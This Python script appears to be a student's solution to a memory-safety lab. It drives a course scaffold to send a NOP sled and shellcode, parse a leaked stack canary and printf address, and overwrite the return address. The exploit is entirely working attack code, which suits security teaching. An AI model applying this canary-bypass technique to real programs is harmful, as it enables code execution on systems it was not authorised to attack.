#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### HELPER FUNCTIONS ###

def int_to_bytes(x: int) -> str:
    return x.to_bytes((x.bit_length() + 7) // 8, 'little').decode('latin1')

### YOUR CODE STARTS HERE ###

# Program start:
p.start()
p.send("\x90" * (256 - len(SHELLCODE)) + SHELLCODE)

# Example receive:
_         = p.recvline()[28:]
canaryraw = p.recvline()[30:]
printfraw = p.recvline()[35:]

canary  = int_to_bytes(int(canaryraw, 16))
retaddr = int_to_bytes(int(printfraw, 16) + 41)
p.send(canary * 4 + retaddr)

### YOUR CODE ENDS HERE ###
